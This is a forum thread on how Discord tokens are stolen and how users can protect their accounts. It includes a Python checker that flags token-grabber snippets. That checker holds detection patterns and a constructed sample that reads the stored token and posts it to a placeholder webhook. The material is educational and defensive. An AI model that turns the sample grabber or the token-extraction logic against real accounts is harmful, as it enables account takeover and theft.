Discord token security: What is a Discord token and how does it leak or get hacked?

Posting this because there's a steady stream of "my Discord got hacked" posts on here and other places I go like Reddit, and 90% of them are totally token-related. Going to break this down so people can actually understand what's happening and what's being said.

Your Discord token is a long string of characters that authenticates you to Discord. It's like a session cookie, except it doesn't expire on a normal schedule and Discord doesn't really invalidate them aggressively. When you log in with username + password + 2FA, you receive a token. That token is what every subsequent request uses. Not your password, only the token.

What this means in practice is that if someone steals your token, they don't need your password. They don't need your 2FA code. They have full access to your account until you take action that invalidates the token (logging out, changing your password, etc.).

How tokens leak:

  1. Browser extension malware. Bad extensions read the local storage of websites you visit. Discord stores its token in browser local storage; the extension reads it, exfiltrates it, and now the attacker has your account.

  2. Malicious downloads from "Discord Nitro generators", cracked games, sketchy installers, etc. Token-stealer payloads are extremely common in this space. Run one and it reads your local Discord installation's storage and exfiltrates the token. Very easy.

  3. Modified Discord clients (BetterDiscord plugins from weird sources, custom clients on GitHub with hidden payloads, etc.) sometimes exfiltrate tokens. The legit version of BetterDiscord doesn't do this. Random GitHub forks might, though.

  4. Console pastes are common. The old classic. Someone tells you to paste a “free Nitro” or “see who unfriended you” command into your browser console while on the web app. The command reads your token and posts it to a webhook. Don’t ever paste anything into a browser console.

  5. Phishing is less common but still happens. Fake Discord login page, you enter credentials, they catch the resulting token. Usually someone you know gets you with this, though.

How to lock down:

  • Use the desktop app, not the browser. Tokens are still extractable from the desktop client, but you reduce extension-based attack options.
  • Look at your installed browser extensions. Less is more. Always.
  • 2FA doesn’t protect you from token theft directly but it does mean you’ll receive an email when the attacker logs into your account from a new location, which is your detection mechanism.
  • If you suspect compromise, change your password immediately. Discord invalidates all existing tokens on password changes.

Token theft is the most common Discord attack vector, and it's almost 100% social engineering. The platform itself is usually not at fault, to be honest. The user gets tricked into running something that exfiltrates the token.
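Since the post describes what a token grabber has to do (read the stored token, then post it to a webhook or other endpoint) and what a token looks like (a long string whose first part encodes your user ID), here is an added example, not code from the original post or from Discord, of a small static checker you can run over a "paste this into your console" snippet, a suspicious extension or plugin file, or a malware log dump before trusting it. The indicator list, the token-shape regexes and the three sample inputs below are my own assumptions and constructed samples, not an official specification or real captured data.

```python
"""Static checker for "paste this in your console" snippets and extension scripts.

Added example, not code from the original post or from Discord. Everything here
is a heuristic: the indicator patterns are the two things a grabber must do
(read the stored token, send it somewhere), and the token-shape regexes are
assumptions about the public token layout (base64url user id . timestamp .
signature, or an "mfa." prefixed form), not an official specification.
"""
import base64
import re

# Indicators a grabber needs: read the token, then ship it out. Assumed heuristic list.
INDICATORS = [
    ("reads_local_storage", re.compile(r"localStorage|webpackChunk|getItem\(\s*['\"]token['\"]", re.I)),
    ("token_keyword", re.compile(r"\btoken\b", re.I)),
    ("discord_webhook", re.compile(r"discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I)),
    ("outbound_request", re.compile(r"\bfetch\(|XMLHttpRequest|navigator\.sendBeacon", re.I)),
    ("iframe_trick", re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)),
]

# Token shapes (assumed from the public layout). In the classic form the first
# segment is the base64url-encoded user id, a 17-20 digit decimal snowflake.
CLASSIC_TOKEN = re.compile(r"\b([A-Za-z0-9_-]{22,28})\.([A-Za-z0-9_-]{6,7})\.([A-Za-z0-9_-]{27,})\b")
MFA_TOKEN = re.compile(r"\bmfa\.[A-Za-z0-9_-]{80,}\b")


def decode_user_id(segment):
    """Return the user id encoded in a token's first segment, or None if it is not one."""
    padded = segment + "=" * (-len(segment) % 4)  # tokens carry no base64 padding
    try:
        raw = base64.urlsafe_b64decode(padded).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    if raw.isdigit() and 17 <= len(raw) <= 20:
        return int(raw)
    return None


def find_tokens(text):
    """Find token-shaped strings; classic ones are only reported with a decodable user id."""
    found = []
    for m in CLASSIC_TOKEN.finditer(text):
        user_id = decode_user_id(m.group(1))
        if user_id is not None:
            found.append({"token": m.group(0), "user_id": user_id, "kind": "classic"})
    for m in MFA_TOKEN.finditer(text):
        found.append({"token": m.group(0), "user_id": None, "kind": "mfa"})
    return found


def assess_snippet(text):
    """Classify a snippet: grabber-like (reads + sends), token-bearing, or clean."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    tokens = find_tokens(text)
    reads = "reads_local_storage" in hits or "token_keyword" in hits
    sends = "discord_webhook" in hits or "outbound_request" in hits
    if reads and sends:
        verdict = "likely token grabber"
    elif tokens:
        verdict = "contains token"
    else:
        verdict = "no grabber indicators"
    return {"indicators": hits, "tokens": tokens, "verdict": verdict}


# Constructed samples (not real code or real tokens). The webhook id and the
# token signature are placeholders; the user id 123456789012345678 is made up.
SAMPLE_GRABBER = """
// "see who unfriended you" style paste (constructed caricature, not a working grabber)
const t = localStorage.getItem("token");
fetch("https://discord.com/api/webhooks/000000000000000000/REDACTED",
      {method: "POST", body: JSON.stringify({content: t})});
"""
SAMPLE_BENIGN = 'document.querySelectorAll("a").forEach(a => console.log(a.href));'
SAMPLE_LOG_LINE = (
    "[stealer log] discord token: "
    "MTIzNDU2Nzg5MDEyMzQ1Njc4.G1a2b3.abcdefghijklmnopqrstuvwxyz0123456789ab"
)

if __name__ == "__main__":
    for label, sample in [("grabber", SAMPLE_GRABBER), ("benign", SAMPLE_BENIGN), ("log", SAMPLE_LOG_LINE)]:
        result = assess_snippet(sample)
        print(f"{label}: {result['verdict']}; indicators={result['indicators']}")
        for tok in result["tokens"]:
            print(f"  token for user {tok['user_id']} ({tok['kind']}): {tok['token'][:12]}...")
```

The decode step is what makes the token check useful in practice: a random `aaa.bbb.ccc` string is noise, but if the first segment base64-decodes to an 18-digit number, you are looking at a real token for that user ID and can go revoke it (change the password, as the post says). Because the regexes are heuristics, a clean verdict means "nothing obvious", not "safe"; the rule in the post still stands, never paste anything into the console.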

This is a great post, but I'd like to just add that when you change your password to invalidate tokens, do this from a device you trust. If your computer has malware, the new token gets stolen too. First clean the machine, then change the password. People miss this step; it's sort of important depending on what type of malware you may have.

One thing worth saying is that token theft usually is not really counted as a data breach in the normal legal sense. Discord did not leak the user's password or login info. The attacker tricked the user or got malware on their device and stole the token that way. That is why hacked accounts do not really show up in Discord transparency reports the same way real platform breaches do.

Security researchers have also found that tons of Discord tokens are always floating around in malware logs. The exact number changes all the time, but it is probably in the hundreds of thousands. Most of those accounts get used for spam, scams, fake accounts, more attacks, or whatever.

OK, I read all this and I don't even know if I have a token or where to find it. Is this something I should actually be worried about as a normal user who doesn't download sketchy stuff?

I got hit by a token stealer in 2023 because I downloaded a "free Nitro tool" from some forum, and three days later my account was sending phishing links to all my friends. Took me a week to clean up the mess, and it was embarrassing too.

Lesson learned the hard way: nobody is giving away free Nitro. If a tool needs your token to work, the tool IS the threat.

Oh god, so the "see who unfriended you" console paste my friend told me about was probably a token grabber, wasn't it. fml.

This is why my 14-year-old keeps getting his account taken over. He won't listen. Sending him this thread and hoping the formatting is enough to hold his attention for five minutes.